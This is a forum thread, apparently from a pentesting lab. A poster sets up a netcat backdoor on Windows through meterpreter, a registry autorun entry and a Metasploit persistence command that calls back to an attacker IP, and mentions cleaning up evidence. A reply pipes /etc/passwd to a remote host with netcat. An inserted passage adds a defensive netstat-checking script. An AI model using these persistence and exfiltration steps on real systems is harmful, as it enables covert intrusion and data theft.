I spent the last few hours in the lab figuring out how to upload, autorun, and clean up all evidence that I had ever had a backdoor on a Windows box.

But I ran across a few things I could not figure out.

Steps:

1. Got a meterpreter shell on the victim
2. Uploaded nc.exe to the system32 folder
3. Set the regkey for running nc in listening mode at startup
4. Logged in as the admin on the victim machine
5. Rebooted the victim's server using the meterpreter reboot cmd
6. Waited for Windows to reboot
7. Logged in as admin on the victim server
8. Connected from BT using the nc IP port command

Questions:

1. When in meterpreter, why can I only reboot the remote victim's machine when someone is logged in on that machine?
2. Why can I only connect to netcat on the victim's machine when someone is logged in on that machine?

What am I doing wrong? Doing it this way just makes me more likely to get caught.

I did give the persistence a try and can now have meterpreter call home whenever I lose the session.

I used

Code:

run persistence -S -A -X -i 10 -p 445 -r 192.168.1.10

I am still lost on how an admin would use netcat to control a server. If he has to log into Windows to be able to make a connection to netcat... then he can control it that way... what is the point of netcat at that time?

Thanks. I thought netcat was a way for admins to administer their boxes without using RDP. While I understand that is kind of silly for them to do, I just thought that was the "legitimate" purpose of netcat. To be honest, as a pentester, I think I would rather have a meterpreter connection than a netcat connection.

I did have issues where the persistence shell did not call home after a few exits. I will have to play around with it some more.

Will persistence still make a connection back to you when you reboot your attacking box? I would think so, but was unable to get it to work for me.

I'm sure there's been an admin or two that have tried, but it's really not a good solution. Hopefully they'd at least use socat or cryptcat and have it connect back to their system, not just bind so anyone on the network could access it.

There are a lot of legitimate uses for netcat. It's great to do basic network tests (i.e. did the firewall change get implemented correctly?):

Code:

# nc -vv google.com 80

Connection to google.com 80 port [tcp/http] succeeded!

I also use it for copying information over the network where I don't want to set up something like file sharing.

Code:

destination: # nc -lp 9999 > goodies.txt
source: # cat /etc/passwd | nc 192.168.1.99 9999

And yes, Meterpreter is preferred to netcat from a pen testing perspective, but it's not always feasible or possible. It's important to know how to get around with a basic shell on both *nix and Windows systems.

I'm not sure why you're not receiving a connection upon a reboot. It works for me:

Make sure you have your listener (multi/handler) set up and waiting for the connection. run persistence will do this for you with -A, but you'll have to configure it manually if you don't use that. Check the output of netstat -anp tcp on your Windows host to start troubleshooting.
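The reply above points at netstat as the place to start troubleshooting. As an added example (not code from the thread or from any of its posters), here is a short Python script that parses Windows netstat -ano output and flags listening TCP ports that are not in a baseline for the host, which is the same check a defender runs to spot a listener like the one described earlier in the thread. The sample netstat output, the baseline port set and the PID-to-image map are constructed for the example; parse_netstat and unexpected_listeners are names chosen here.

```python
"""Flag unexpected listening TCP ports in Windows 'netstat -ano' output.

Added example, not part of the original thread. It assumes the column
layout of 'netstat -ano' on Windows (Proto, Local Address, Foreign
Address, State, PID) and a baseline of listeners the host is expected
to have; the sample output, the baseline and the PID map are constructed.
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed sample: what a defender might see on a host after a startup
# entry has fired. Port 4444 / PID 2312 is the one not in the baseline.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       836
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       2312
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING       4
  TCP    192.168.1.20:3389      192.168.1.10:51234     ESTABLISHED     1208
  TCP    [::]:135               [::]:0                 LISTENING       836
  UDP    0.0.0.0:123            *:*                                    1044
"""

# Constructed baseline: TCP ports this host is expected to listen on.
EXPECTED_TCP_LISTENERS = {135, 139, 445, 3389}

# Constructed PID -> image name map, as 'tasklist' would report it (hypothetical values).
SAMPLE_TASKLIST = {836: "svchost.exe", 4: "System", 2312: "nc.exe", 1208: "svchost.exe"}

# One socket line: proto, local, foreign, optional state (UDP has none), PID.
_LINE = re.compile(
    r"^\s*(TCP|UDP)\s+(\S+)\s+(\S+)\s+"
    r"(LISTENING|ESTABLISHED|TIME_WAIT|CLOSE_WAIT|SYN_SENT|SYN_RECEIVED)?\s*(\d+)\s*$"
)


def _port(addr: str) -> int:
    """Extract the port from '0.0.0.0:135' or '[::]:135'."""
    return int(addr.rsplit(":", 1)[1])


def parse_netstat(text: str) -> List[Dict[str, object]]:
    """Return one record per socket line; header and blank lines are skipped."""
    records = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        proto, local, foreign, state, pid = m.groups()
        records.append({"proto": proto, "local": local, "port": _port(local),
                        "foreign": foreign, "state": state or "", "pid": int(pid)})
    return records


def unexpected_listeners(text: str, expected: set,
                         tasklist: Optional[Dict[int, str]] = None) -> List[Tuple[int, int, str]]:
    """TCP LISTENING sockets whose local port is not in the expected baseline.

    Returns sorted (port, pid, image) tuples; image is '?' when the PID is unknown.
    """
    tasklist = tasklist or {}
    found = set()
    for r in parse_netstat(text):
        if r["proto"] == "TCP" and r["state"] == "LISTENING" and r["port"] not in expected:
            found.add((r["port"], r["pid"], tasklist.get(r["pid"], "?")))
    return sorted(found)


if __name__ == "__main__":
    for port, pid, image in unexpected_listeners(SAMPLE_NETSTAT, EXPECTED_TCP_LISTENERS, SAMPLE_TASKLIST):
        print(f"unexpected listener: tcp/{port} pid={pid} image={image}")
```

On a real host you would feed the script the saved output of netstat -ano and a baseline taken from a known-good build of the same system, and resolve the PID with tasklist. A listener that only appears in this output after someone has logged in is consistent with a Run-key startup entry, since those entries execute at interactive logon rather than at boot.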

Way to actually get your hands dirty and not just memorize trivia for your CEH